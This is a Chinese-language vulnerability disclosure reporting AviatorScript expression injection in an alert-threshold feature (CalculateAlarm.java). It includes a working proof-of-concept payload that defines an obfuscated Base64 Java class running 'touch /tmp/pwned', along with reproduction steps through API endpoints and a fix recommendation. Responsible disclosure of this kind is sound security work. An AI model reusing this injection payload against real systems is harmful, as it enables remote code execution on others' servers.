在CalculateAlarm.java中,使用了AviatorEvaluator来直接执行表达式功能,并且没有进行任何安全策略的配置,导致AviatorScript(其默认可以执行任意的静态方法)脚本注入
例如运行下面这单AviatorScript脚本可以导致执行touch /tmp/pwned命令
use org.springframework.util.ClassUtils;let loader = ClassUtils.getDefaultClassLoader();use org.springframework.util.Base64Utils;let str = Base64Utils.decodeFromString('yv66vgAAADcAJwoACQAXCgAYABkIABoKABgAGwcAHAcAHQoABgAeBwAfBwAgAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAZMRXZpbDsBAAg8Y2xpbml0PgEAAWUBABVMamF2YS9pby9JT0V4Y2VwdGlvbjsBAA1TdGFja01hcFRhYmxlAQAKU291cmNlRmlsZQEACUV2aWwuamF2YQwACgALBwAhDAAiACMBABB0b3VjaCAvdG1wL3B3bmVkDAAkACUBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24MAAoAJgEABEV2aWwBABBqYXZhL2xhbmcvT2JqZWN0AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAGChMamF2YS9sYW5nL1Rocm93YWJsZTspVgAhAAgACQAAAAAAAgABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAAMADgAAAAwAAQAAAAUADwAQAAAACAARAAsAAQAMAAAAZgADAAEAAAAXuAACEgO2AARXpwANS7sABlkqtwAHv7EAAQAAAAkADAAFAAMADQAAABYABQAAAAYACQAJAAwABwANAAgAFgAKAA4AAAAMAAEADQAJABIAEwAAABQAAAAHAAJMBwAFCQABABUAAAACABY=');use org.springframework.cglib.core.ReflectUtils;ReflectUtils.defineClass('Evil',str,loader);
luelueking Reporter
漏洞原因
在CalculateAlarm.java中,使用了AviatorEvaluator来直接执行表达式功能,并且没有进行任何安全策略的配置,导致AviatorScript(其默认可以执行任意的静态方法)脚本注入
例如运行下面这单AviatorScript脚本可以导致执行touch /tmp/pwned命令
漏洞复现
访问/api/alert/define定义阈值触发表达式
访问/api/monitor添加网站监控,并触发表达式
docker中成功执行命令
修复建议
根据AviatorScript文档设置对应的安全策略,如禁用java静态方法任意执行等安全配置